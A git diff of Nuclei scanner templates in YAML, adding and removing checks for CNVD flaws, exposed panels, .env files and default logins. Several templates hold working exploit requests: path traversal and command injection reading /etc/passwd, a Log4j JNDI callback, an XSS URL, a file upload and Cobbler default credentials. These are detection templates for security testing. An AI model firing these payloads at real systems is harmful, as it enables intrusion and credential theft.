diff --git a/nuclei-templates/Other/cnvd-2021-10543-1085.yaml b/nuclei-templates/Other/cnvd-2021-10543-1085.yaml
deleted file mode 100644
index 6f3f3af8f2..0000000000
--- a/nuclei-templates/Other/cnvd-2021-10543-1085.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CNVD-2021-10543
-
-info:
- name: EEA Information Disclosure
- author: pikpikcu
- severity: high
- reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
- tags: config,exposure,cnvd,cnvd2021
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/authenticationserverservlet"
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "(.*?)"
- - "(.*?)"
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cnvd-2021-15822-1089.yaml b/nuclei-templates/Other/cnvd-2021-15822-1089.yaml
new file mode 100644
index 0000000000..8b8f8eba47
--- /dev/null
+++ b/nuclei-templates/Other/cnvd-2021-15822-1089.yaml
@@ -0,0 +1,23 @@
+id: CNVD-2021-15822
+info:
+ name: ShopXO Download File Read
+ author: pikpikcu
+ severity: high
+ reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
+ tags: shopxo,lfi,cnvd,cnvd2021
+requests:
+ - raw:
+ - |
+ GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/17
diff --git a/nuclei-templates/Other/cnvd-2021-15822-1094.yaml b/nuclei-templates/Other/cnvd-2021-15822-1094.yaml
deleted file mode 100644
index 02ff83b22e..0000000000
--- a/nuclei-templates/Other/cnvd-2021-15822-1094.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CNVD-2021-15822
-
-info:
- name: ShopXO Download File Read
- author: pikpikcu
- severity: high
- reference:
- - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
- metadata:
- verified: true
- shodan-query: title:"ShopXO企业级B2C电商系统提供商"
- fofa-query: app="ShopXO企业级B2C电商系统提供商"
- tags: shopxo,lfi,cnvd,cnvd2021
-
-requests:
- - raw:
- - |
- GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/17
diff --git a/nuclei-templates/Other/cnvd-2021-15824-1096.yaml b/nuclei-templates/Other/cnvd-2021-15824-1096.yaml
deleted file mode 100644
index 972a1b6064..0000000000
--- a/nuclei-templates/Other/cnvd-2021-15824-1096.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: CNVD-2021-15824
-
-info:
- name: EmpireCMS DOM Cross Site-Scripting
- author: daffainfo
- severity: high
- description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.
- reference:
- - https://sourceforge.net/projects/empirecms/
- - https://www.bilibili.com/read/cv10441910
- - https://vul.wangan.com/a/CNVD-2021-15824
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
- cvss-score: 7.2
- cwe-id: CWE-79
- tags: empirecms,cnvd,cnvd2021,xss,domxss
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'if(Request("url")!=0)'
- - 'href=\""+Request("url")+"\"'
- condition: and
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/23
diff --git a/nuclei-templates/Other/cnvd-2021-17369-1102.yaml b/nuclei-templates/Other/cnvd-2021-17369-1102.yaml
index 43487027d3..bf303ebab1 100644
--- a/nuclei-templates/Other/cnvd-2021-17369-1102.yaml
+++ b/nuclei-templates/Other/cnvd-2021-17369-1102.yaml
@@ -2,15 +2,9 @@ id: CNVD-2021-17369
info:
name: Ruijie Smartweb Management System Password Information Disclosure
author: pikpikcu
- severity: high
- description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege.
- reference:
- - https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- tags: ruijie,disclosure,cnvd,cnvd2021
+ severity: medium
+ reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
+ tags: ruijie,disclosure,cnvd
requests:
- method: GET
path:
@@ -20,13 +14,11 @@ requests:
matchers-condition: and
matchers:
- type: word
- part: body
words:
- ""
- ""
+ part: body
condition: and
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/03/16
diff --git a/nuclei-templates/Other/cnvd-2021-26422-1103.yaml b/nuclei-templates/Other/cnvd-2021-26422-1103.yaml
new file mode 100644
index 0000000000..c9485ec160
--- /dev/null
+++ b/nuclei-templates/Other/cnvd-2021-26422-1103.yaml
@@ -0,0 +1,32 @@
+id: CNVD-2021-26422
+info:
+ name: eYouMail - Remote Code Execution
+ author: daffainfo
+ severity: critical
+ description: eYouMail is susceptible to a remote code execution vulnerability.
+ reference:
+ - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py
+ - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
+ cwe-id: CWE-77
+ tags: eyoumail,rce,cnvd,cnvd2021
+requests:
+ - raw:
+ - |
+ POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ type='|cat /etc/passwd||'
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/12
diff --git a/nuclei-templates/Other/cnvd-2021-26422-1104.yaml b/nuclei-templates/Other/cnvd-2021-26422-1104.yaml
deleted file mode 100644
index e159383415..0000000000
--- a/nuclei-templates/Other/cnvd-2021-26422-1104.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CNVD-2021-26422
-
-info:
- name: eYouMail - Remote Code Execution
- author: daffainfo
- severity: critical
- reference:
- - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py
- - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md
- tags: eyoumail,rce,cnvd,cnvd2021
-
-requests:
- - raw:
- - |
- POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- type='|cat /etc/passwd||'
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cnvd-2021-28277-1105.yaml b/nuclei-templates/Other/cnvd-2021-28277-1105.yaml
new file mode 100644
index 0000000000..51f36fbda2
--- /dev/null
+++ b/nuclei-templates/Other/cnvd-2021-28277-1105.yaml
@@ -0,0 +1,38 @@
+id: CNVD-2021-28277
+info:
+ name: Landray-OA Arbitrary - Arbitrary File Retrieval
+ author: pikpikcu,daffainfo
+ severity: high
+ reference:
+ - https://www.aisoutu.com/a/1432457
+ - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
+ metadata:
+ fofa-query: app="Landray OA system"
+ tags: landray,lfi,cnvd,cnvd2021
+requests:
+ - raw:
+ - |
+ POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: application/x-www-form-urlencoded
+
+ var={"body":{"file":"file:///etc/passwd"}}
+ - |
+ POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: application/x-www-form-urlencoded
+
+ var={"body":{"file":"file:///c://windows/win.ini"}}
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - "for 16-bit app support"
+ condition: or
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cnvd-2021-28277-1106.yaml b/nuclei-templates/Other/cnvd-2021-28277-1106.yaml
deleted file mode 100644
index f6d977db7f..0000000000
--- a/nuclei-templates/Other/cnvd-2021-28277-1106.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: CNVD-2021-28277
-info:
- name: Landray-OA Arbitrary File Download
- author: pikpikcu,daffainfo
- severity: high
- reference:
- - https://www.aisoutu.com/a/1432457
- - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
- metadata:
- fofa-query: app="Landray OA system"
- tags: landray,lfi,cnvd,cnvd2021
-requests:
- - raw:
- - |
- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- Content-Type: application/x-www-form-urlencoded
-
- var={"body":{"file":"file:///etc/passwd"}}
- - |
- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- Content-Type: application/x-www-form-urlencoded
-
- var={"body":{"file":"file:///c://windows/win.ini"}}
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - "for 16-bit app support"
- condition: or
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cnvd-2021-49104-1115.yaml b/nuclei-templates/Other/cnvd-2021-49104-1115.yaml
index d30f78152a..1d2627bca2 100644
--- a/nuclei-templates/Other/cnvd-2021-49104-1115.yaml
+++ b/nuclei-templates/Other/cnvd-2021-49104-1115.yaml
@@ -1,12 +1,18 @@
id: CNVD-2021-49104
-
info:
name: Pan Micro E-office File Uploads
+ description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
+ remediation: Pan Wei has released an update to resolve this vulnerability.
author: pikpikcu
severity: critical
- reference: https://chowdera.com/2021/12/202112200602130067.html
+ reference:
+ - https://chowdera.com/2021/12/202112200602130067.html
+ - http://v10.e-office.cn
tags: pan,micro,cnvd,cnvd2021
-
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
+ cvss-score: 9.9
+ cwe-id: CWE-434
requests:
- raw:
- |
@@ -21,18 +27,17 @@ requests:
--e64bdf16c554bbc109cecef6451c26a4--
-
- |
GET /images/logo/logo-eoffice.php HTTP/1.1
Host: {{Hostname}}
-
matchers-condition: and
matchers:
- type: word
part: body
words:
- "94d01a2324ce38a2e29a629c54190f67"
-
- type: status
status:
- 200
+
+# Enhanced by cs on 2022/02/28
diff --git a/nuclei-templates/Other/cobbler-default-login-1118.yaml b/nuclei-templates/Other/cobbler-default-login-1118.yaml
deleted file mode 100644
index 2c2e0ed27a..0000000000
--- a/nuclei-templates/Other/cobbler-default-login-1118.yaml
+++ /dev/null
@@ -1,59 +0,0 @@
-id: cobbler-default-login
-info:
- name: Cobbler Default Login
- author: c-sh0
- reference:
- - https://github.com/cobbler/cobbler/issues/2307
- - https://github.com/cobbler/cobbler/issues/2909
- severity: high
- tags: cobbler,default-login,api
-requests:
- - raw:
- - |
- POST {{BaseURL}}/cobbler_api HTTP/1.1
- Host: {{Hostname}}
- Content-Type: text/xml
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-
-
-
- login
-
-
-
- {{username}}
-
-
-
-
- {{password}}
-
-
-
-
- attack: pitchfork
- payloads:
- username:
- - cobbler
- - testing
- password:
- - cobbler
- - testing
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- part: header
- words:
- - 'text/xml'
- - type: dsl
- dsl:
- - "!contains(tolower(body), 'faultCode')"
- - "!contains(tolower(body), 'login failed')"
- condition: or
- - type: regex
- part: body
- regex:
- - "(.*[a-zA-Z0-9].+==)"
diff --git a/nuclei-templates/Other/cobbler-default-login-1120.yaml b/nuclei-templates/Other/cobbler-default-login-1120.yaml
new file mode 100644
index 0000000000..a1a6d0fed4
--- /dev/null
+++ b/nuclei-templates/Other/cobbler-default-login-1120.yaml
@@ -0,0 +1,65 @@
+id: cobbler-default-login
+info:
+ name: Cobbler Default Login
+ author: c-sh0
+ description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
+ reference:
+ - https://seclists.org/oss-sec/2022/q1/146
+ - https://github.com/cobbler/cobbler/issues/2307
+ - https://github.com/cobbler/cobbler/issues/2909
+ severity: high
+ tags: cobbler,default-login,api
+ classification:
+ cwe-id: CWE-798
+requests:
+ - raw:
+ - |
+ POST {{BaseURL}}/cobbler_api HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+
+
+ login
+
+
+
+ {{username}}
+
+
+
+
+ {{password}}
+
+
+
+
+ attack: pitchfork
+ payloads:
+ username:
+ - cobbler
+ - testing
+ password:
+ - cobbler
+ - testing
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: header
+ words:
+ - 'text/xml'
+ - type: dsl
+ dsl:
+ - "!contains(tolower(body), 'faultCode')"
+ - "!contains(tolower(body), 'login failed')"
+ condition: or
+ - type: regex
+ part: body
+ regex:
+ - "(.*[a-zA-Z0-9].+==)"
+
+# Enhanced by mp on 2022/03/03
diff --git a/nuclei-templates/Other/cockpit-detect-1127.yaml b/nuclei-templates/Other/cockpit-detect-1127.yaml
index 30bf745acc..81dd323dc8 100644
--- a/nuclei-templates/Other/cockpit-detect-1127.yaml
+++ b/nuclei-templates/Other/cockpit-detect-1127.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Agentejo Cockpit
author: dwisiswant0
severity: info
+ tags: tech,cockpit
requests:
- method: GET
diff --git a/nuclei-templates/Other/cockpit-workflow-1129.yaml b/nuclei-templates/Other/cockpit-workflow.yaml
similarity index 100%
rename from nuclei-templates/Other/cockpit-workflow-1129.yaml
rename to nuclei-templates/Other/cockpit-workflow.yaml
diff --git a/nuclei-templates/Other/code42-log4j-rce-1131.yaml b/nuclei-templates/Other/code42-log4j-rce-1131.yaml
deleted file mode 100644
index ab51e3525a..0000000000
--- a/nuclei-templates/Other/code42-log4j-rce-1131.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: code42-log4j-rce
-
-info:
- name: Log4j Code42 RCE
- author: Adam Crosser
- severity: critical
- description: Remote code execution via log4j vulnerability
- reference: https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents
- classification:
- cve-id: CVE-2021-44228
- tags: jndi,log4j,rce,cve,cve2021,oast,code42
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
-
- matchers-condition: and
- matchers:
- - type: word
- part: interactsh_protocol # Confirms the DNS Interaction
- words:
- - "dns"
-
- - type: regex
- part: interactsh_request
- regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
-
- extractors:
- - type: regex
- part: interactsh_request
- group: 1
- regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
diff --git a/nuclei-templates/Other/code42-log4j-rce-1132.yaml b/nuclei-templates/Other/code42-log4j-rce-1132.yaml
new file mode 100644
index 0000000000..31d6ae06ba
--- /dev/null
+++ b/nuclei-templates/Other/code42-log4j-rce-1132.yaml
@@ -0,0 +1,30 @@
+id: code42-log4j-rce
+info:
+ name: Log4j Code42 RCE
+ author: Adam Crosser
+ severity: critical
+ description: Remote code execution via log4j vulnerability
+ reference: https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents
+ classification:
+ cve-id: CVE-2021-44228
+ tags: jndi,log4j,rce,cve,cve2021,oast,code42
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ extractors:
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
diff --git a/nuclei-templates/Other/codeigniter-env-1133.yaml b/nuclei-templates/Other/codeigniter-env-1133.yaml
new file mode 100644
index 0000000000..3d19875c13
--- /dev/null
+++ b/nuclei-templates/Other/codeigniter-env-1133.yaml
@@ -0,0 +1,35 @@
+id: codeigniter-env
+
+info:
+ name: Codeigniter .env file
+ author: emenalf
+ severity: high
+ tags: config,exposure,codeigniter
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.env"
+ - "{{BaseURL}}/.env.dev.local"
+ - "{{BaseURL}}/.env.development.local"
+ - "{{BaseURL}}/.env.prod.local"
+ - "{{BaseURL}}/.env.production.local"
+ - "{{BaseURL}}/.env.local"
+ - "{{BaseURL}}/.env.example"
+ - "{{BaseURL}}/.env.stage"
+ - "{{BaseURL}}/.env.live"
+ - "{{BaseURL}}/.env_1"
+ - "{{BaseURL}}/.env.old"
+ - "{{BaseURL}}/.env_sample"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "(?m)^APP_(NAME|ENV|KEY|DEBUG|URL|PASSWORD)"
+ - "(?m)^DB_(HOST|PASSWORD|DATABASE)"
+ condition: or
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/codeigniter-env-1134.yaml b/nuclei-templates/Other/codeigniter-env-1134.yaml
deleted file mode 100644
index 02026c4c64..0000000000
--- a/nuclei-templates/Other/codeigniter-env-1134.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: codeigniter-env
-info:
- name: Codeigniter - .env File Discovery
- author: emenalf
- severity: high
- description: Codeigniter .env file was discovered.
- tags: config,exposure,codeigniter
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/.env"
- - "{{BaseURL}}/.env.dev.local"
- - "{{BaseURL}}/.env.development.local"
- - "{{BaseURL}}/.env.prod.local"
- - "{{BaseURL}}/.env.production.local"
- - "{{BaseURL}}/.env.local"
- - "{{BaseURL}}/.env.example"
- - "{{BaseURL}}/.env.stage"
- - "{{BaseURL}}/.env.live"
- - "{{BaseURL}}/.env_1"
- - "{{BaseURL}}/.env.old"
- - "{{BaseURL}}/.env_sample"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "(?m)^APP_(NAME|ENV|KEY|DEBUG|URL|PASSWORD)"
- - "(?m)^DB_(HOST|PASSWORD|DATABASE)"
- condition: or
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/07/15
diff --git a/nuclei-templates/Other/codian-mcu-login-1140.yaml b/nuclei-templates/Other/codian-mcu-login-1140.yaml
new file mode 100644
index 0000000000..0299bf2888
--- /dev/null
+++ b/nuclei-templates/Other/codian-mcu-login-1140.yaml
@@ -0,0 +1,24 @@
+id: codian-mcu-login
+
+info:
+ name: Codian MCU Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/7404
+ tags: iot
+ metadata:
+ shodan-query: 'http.title:"Codian MCU - Home page"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Codian MCU - login:'
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/codian-mcu-login.yaml b/nuclei-templates/Other/codian-mcu-login.yaml
deleted file mode 100644
index 5f3afaa08c..0000000000
--- a/nuclei-templates/Other/codian-mcu-login.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: codian-mcu-login
-
-info:
- name: Codian MCU Login
- author: dhiyaneshDK
- severity: info
- reference:
- - https://www.exploit-db.com/ghdb/7404
- metadata:
- shodan-query: http.title:"Codian MCU - Home page"
- tags: iot
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/login.html'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Codian MCU - login:'
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cofense-vision-panel-1141.yaml b/nuclei-templates/Other/cofense-vision-panel-1141.yaml
new file mode 100644
index 0000000000..256839982f
--- /dev/null
+++ b/nuclei-templates/Other/cofense-vision-panel-1141.yaml
@@ -0,0 +1,28 @@
+id: cofense-vision-panel
+
+info:
+ name: Cofense Vision Panel Detect
+ author: Adam Crosser
+ severity: info
+ reference:
+ - https://cofense.com
+ metadata:
+ shodan-query: http.favicon.hash:739801466
+ tags: panel,cofense,vision
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Vision"
+ - "Cofense Inc."
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cofense-vision-panel-1142.yaml b/nuclei-templates/Other/cofense-vision-panel-1142.yaml
deleted file mode 100644
index 85bcf2a18f..0000000000
--- a/nuclei-templates/Other/cofense-vision-panel-1142.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: cofense-vision-panel
-
-info:
- name: Cofense Vision Panel
- author: Adam Crosser
- severity: info
- reference: https://cofense.com/
- tags: panel
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/login'
- redirects: true
-
- matchers:
- - type: word
- words:
- - "We're sorry but vision-ui doesn't work properly without JavaScript enabled"
-
diff --git a/nuclei-templates/Other/cold-fusion-cfcache-map.yaml b/nuclei-templates/Other/cold-fusion-cfcache-map.yaml
index a63b913656..4a421602b6 100644
--- a/nuclei-templates/Other/cold-fusion-cfcache-map.yaml
+++ b/nuclei-templates/Other/cold-fusion-cfcache-map.yaml
@@ -1,25 +1,28 @@
-id: cold-fusion-cfcache-map
-
-info:
- name: Discover Cold Fusion cfcache.map Files
- reference: https://securiteam.com/windowsntfocus/5bp081f0ac/
- author: geeknik
- severity: low
- tags: exposure,coldfusion,adobe
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cfcache.map"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Mapping="
- - "SourceTimeStamp="
- condition: and
-
- - type: status
- status:
- - 200
+id: cold-fusion-cfcache-map
+
+info:
+ name: Discover Cold Fusion cfcache.map Files
+ author: geeknik
+ severity: low
+ reference:
+ - https://securiteam.com/windowsntfocus/5bp081f0ac/
+ metadata:
+ shodan-query: http.component:"Adobe ColdFusion"
+ tags: exposure,coldfusion,adobe
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cfcache.map"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Mapping="
+ - "SourceTimeStamp="
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/coldfusion-administrator-login-1147.yaml b/nuclei-templates/Other/coldfusion-administrator-login-1147.yaml
new file mode 100644
index 0000000000..217efea2ee
--- /dev/null
+++ b/nuclei-templates/Other/coldfusion-administrator-login-1147.yaml
@@ -0,0 +1,23 @@
+id: coldfusion-administrator-login
+
+info:
+ name: ColdFusion Administrator Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22
+ tags: panel,coldfusion,adobe
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'ColdFusion Administrator Login'
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/coldfusion-administrator-login.yaml b/nuclei-templates/Other/coldfusion-administrator-login.yaml
deleted file mode 100644
index a7eafe4520..0000000000
--- a/nuclei-templates/Other/coldfusion-administrator-login.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: coldfusion-administrator-login
-
-info:
- name: ColdFusion Administrator Login
- author: dhiyaneshDK
- severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22
- tags: panel,coldfusion,adobe
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'ColdFusion Administrator Login'
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/commax-credentials-disclosure-1158.yaml b/nuclei-templates/Other/commax-credentials-disclosure-1160.yaml
similarity index 100%
rename from nuclei-templates/Other/commax-credentials-disclosure-1158.yaml
rename to nuclei-templates/Other/commax-credentials-disclosure-1160.yaml
diff --git a/nuclei-templates/Other/concourse-ci-panel-1170.yaml b/nuclei-templates/Other/concourse-ci-panel-1170.yaml
new file mode 100644
index 0000000000..273493c803
--- /dev/null
+++ b/nuclei-templates/Other/concourse-ci-panel-1170.yaml
@@ -0,0 +1,24 @@
+id: concourse-ci-panel
+
+info:
+ name: Concourse CI Panel Detect
+ author: praetorian-thendrickson
+ severity: info
+ reference:
+ - https://github.com/concourse/concourse
+ - https://concourse-ci.org
+ metadata:
+ shodan-query: title:"Concourse"
+ tags: panel,concourse,oss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers:
+ - type: word
+ words:
+ - 'Concourse'
+ - 'login to Concourse'
+ condition: or
diff --git a/nuclei-templates/Other/concourse-ci-panel.yaml b/nuclei-templates/Other/concourse-ci-panel.yaml
deleted file mode 100644
index 7829b0feb4..0000000000
--- a/nuclei-templates/Other/concourse-ci-panel.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: concourse-ci-panel
-
-info:
- name: Concourse CI Panel
- author: praetorian-thendrickson
- severity: info
- reference: https://www.shodan.io/search?query=title%3A%22Concourse%22
- tags: panel
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- redirects: true
-
- matchers:
- - type: word
- words:
- - 'Concourse'
diff --git a/nuclei-templates/Other/concrete-xss.yaml b/nuclei-templates/Other/concrete-xss-1177.yaml
similarity index 100%
rename from nuclei-templates/Other/concrete-xss.yaml
rename to nuclei-templates/Other/concrete-xss-1177.yaml
diff --git a/nuclei-templates/Other/concrete5-install-1171.yaml b/nuclei-templates/Other/concrete5-install-1171.yaml
new file mode 100644
index 0000000000..3453d1b06b
--- /dev/null
+++ b/nuclei-templates/Other/concrete5-install-1171.yaml
@@ -0,0 +1,33 @@
+id: concrete5-install
+info:
+ name: Concrete5 Install Panel
+ author: osamahamad,princechaddha
+ severity: critical
+ reference: https://documentation.concretecms.org/developers/introduction/installing-concrete-cms
+ metadata:
+ shodan-query: http.title:"Install concrete5"
+ tags: panel,concrete,cms
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php/install"
+ - "{{BaseURL}}/concrete5/index.php/install"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - 'Install concrete5'
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'Version ([0-9.]+)'
diff --git a/nuclei-templates/Other/concrete5-install.yaml b/nuclei-templates/Other/concrete5-install.yaml
deleted file mode 100644
index 1bd33c834d..0000000000
--- a/nuclei-templates/Other/concrete5-install.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: concrete5-install
-info:
- name: Concrete5 Install Panel
- author: osamahamad,princechaddha
- severity: critical
- reference: https://documentation.concretecms.org/developers/introduction/installing-concrete-cms
- metadata:
- shodan-query: http.title:"Install concrete5"
- tags: panel,concrete,cms
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php/install"
- - "{{BaseURL}}/concrete5/index.php/install"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- part: body
- words:
- - 'Install concrete5'
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - 'Version ([0-9.]+)'
diff --git a/nuclei-templates/Other/condition-flow-no-operators.yaml b/nuclei-templates/Other/condition-flow-no-operators.yaml
index 8dcb7c4f06..dd76c89b54 100644
--- a/nuclei-templates/Other/condition-flow-no-operators.yaml
+++ b/nuclei-templates/Other/condition-flow-no-operators.yaml
@@ -11,17 +11,16 @@ dns:
- name: "{{FQDN}}"
type: CNAME
- extractors:
- - type: dsl
- name: cname
+ matchers:
+ - type: word
+ words:
+ - "ghost.io"
internal: true
